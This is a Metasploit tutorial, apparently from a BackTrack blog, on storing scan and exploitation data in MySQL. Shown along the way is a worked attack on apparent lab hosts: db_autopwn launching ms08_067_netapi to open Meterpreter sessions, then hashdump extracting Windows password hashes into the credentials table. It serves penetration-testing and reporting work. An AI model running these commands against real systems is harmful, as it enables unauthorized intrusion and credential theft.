BackTrack

Metasploit with MySQL in BackTrack 4 r2

Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.

root@bt:~# msfconsole

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 316 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11078 updated today (2010.11.19)

msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3

We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.

msf > db_driver mysql
[*] Using database driver mysql
msf > /etc/init.d/mysql start
[*] exec: /etc/init.d/mysql start

Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*]    Usage: db_connect @/
[*]       OR: db_connect -y [path/to/database.yml]
[*] Examples:
[*]        db_connect user@metasploit3
[*]        db_connect user:pass@192.168.0.2/metasploit3
[*]        db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3

In order to have some hosts to use as targets and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the filetype and import it for us.

msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus

After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.

msf > db_hosts -h
Usage: db_hosts [-h|--help] [-u|--up] [-a ] [-c
] [-o output-file ]

-a   Search for a list of addresses
-c
Only show the given columns
-h,--help         Show this help information
-u,--up           Only show hosts which are up
-o          Send output to a file in csv format

Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at

msf > db_hosts -c address,mac

Hosts
=====

address         mac
-------         ---
192.168.69.100  00:0C:29:DE:1A:00
192.168.69.105  00:0C:29:9A:FC:E0
192.168.69.110  00:0C:29:69:9C:44
192.168.69.130  00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141  00:0C:29:F3:40:70
192.168.69.142  00:0C:29:57:63:E2
192.168.69.143  00:0C:29:32:29:79
192.168.69.146
192.168.69.171  00:0C:29:EC:23:47
192.168.69.173  00:0C:29:45:7D:33
192.168.69.175  00:0C:29:BB:38:53
192.168.69.199  00:0C:29:58:09:DA
192.168.69.50

Far more interesting than IP and MAC addresses are what services are running on our target systems which is what db_services will show us.

msf > db_services -h

Usage: db_services [-h|--help] [-u|--up] [-a ] [-r
] [-p
] [-n ]

-a   Search for a list of addresses
-c
Only show the given columns
-h,--help         Show this help information
-n   Search for a list of service names
-p
Search for a list of ports
-r
Only show [tcp|udp] services
-u,--up           Only show services which are up

Available columns: created_at, info, name, port, proto, state, updated_at

msf > db_services -c name,port,proto

Services
========

name            port   proto  Host            Workspace
----            ----   -----  ----            ---------
192.168.69.100  123    udp    192.168.69.100  default
192.168.69.100  135    tcp    192.168.69.100  default
192.168.69.100  137    udp    192.168.69.100  default
192.168.69.100  139    tcp    192.168.69.100  default
192.168.69.100  445    tcp    192.168.69.100  default
192.168.69.100  3389   tcp    192.168.69.100  default
192.168.69.105  123    udp    192.168.69.105  default
...snip...

Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.

msf > db_vulns
[*] Time: Sat Nov 20 20:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26920 refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 20 20:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445 proto=tcp name=NSS-26919 refs=CVE-1999-0505
...snip...

For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h          Display this help text
-t          Show all matching exploit modules
-x          Select modules based on vulnerability references
-p          Select modules based on open ports
-e          Launch exploits against all matched targets
-r          Use a reverse connect shell
-b          Use a bind shell on a random port (default)
-q          Disable exploit module output
-R  [rank]  Only run modules with a minimal rank
-I  [range] Only exploit hosts inside this range
-X  [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m  [regex] Only run modules whose name matches the regex
-T  [secs]  Maximum runtime for any exploit in seconds

msf > db_autopwn -x -e -R good
[*] (1/30 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*] (2/30 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 20 15:45:24 -0500 2010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 20 15:45:24 -0500 2010
[*] (30/30 [2 sessions]): Waiting on 2 launched modules to finish execution...
[*] (30/30 [2 sessions]): Waiting on 0 launched modules to finish execution...

In a brief amount of time, Metasploit has delivered 2 Meterpreter sessions to us.

msf > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
--  ----                   -----------                            ----------
1   meterpreter x86/win32                                         192.168.69.140:54342 -> 192.168.69.105:34160
2   meterpreter x86/win32  NT AUTHORITYSYSTEM @ V-XPSP2-TEMPLAT  192.168.69.140:53895 -> 192.168.69.100:30423

Running db_exploited now will list not only the hosts that were exploited but also the port and exploit that was successful against them.

msf > db_exploited
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 20 20:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445 proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.

Post exploitation is critical and you can frequently make use of credentials gathered to penetrate deeper into a target network. Metasploit has the db_add_cred command that allows you to insert credentials into the database as you come across them during your engagement.

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 20 20:54:36 UTC 2010 Credential: host=192.168.69.105 port=445 proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >

All of these database features are very powerful and exciting but just as exciting is that your entire session is now available with MYSQL.

root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or g.
Your MySQL connection id is 56
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or 'h' for help. Type 'c' to clear the buffer.

mysql> use msf3;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------------+
| Tables_in_msf3              |
+-----------------------------+
| attachments                 |
| attachments_email_templates |
| campaigns                   |
| clients                     |
| creds                       |
| email_addresses             |
| email_templates             |
| events                      |
| exploited_hosts             |
| hosts                       |
| imported_creds              |
| loots                       |
| notes                       |
| project_members             |
| refs                        |
| report_templates            |
| reports                     |
| schema_migrations           |
| services                    |
| tasks                       |
| users                       |
| vulns                       |
| vulns_refs                  |
| web_forms                   |
| web_pages                   |
| web_sites                   |
| web_templates               |
| web_vulns                   |
| wmap_requests               |
| wmap_targets                |
| workspaces                  |
+-----------------------------+
31 rows in set (0.00 sec)

We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.

mysql> select * from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name                                | payload                              | created_at          | updated_at          |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
|  1 |      14 |        131 | oc5vd2zl     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
|  2 |      15 |        137 | qwtwtqfj     | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp | 2010-11-20 20:45:24 | 2010-11-20 20:45:24 |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at          | updated_at          | user          | pass                                                                                   | active | proof | ptype    | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
|  1 |        131 | 2010-11-20 20:54:36 | 2010-11-20 20:54:36 | Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: |      1 | NULL  | password |      NULL | NULL        |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 rows in set (0.00 sec)

mysql>

At first glance, database integration is not that compelling but it opens the door for the community to develop customized reporting apps using such a widely used database like MYSQL easing the post-penetration test reporting burden.

For further details on setting up and using the various databases in Metasploit, check out the Using the MSF Database section in Metasploit Unleashed.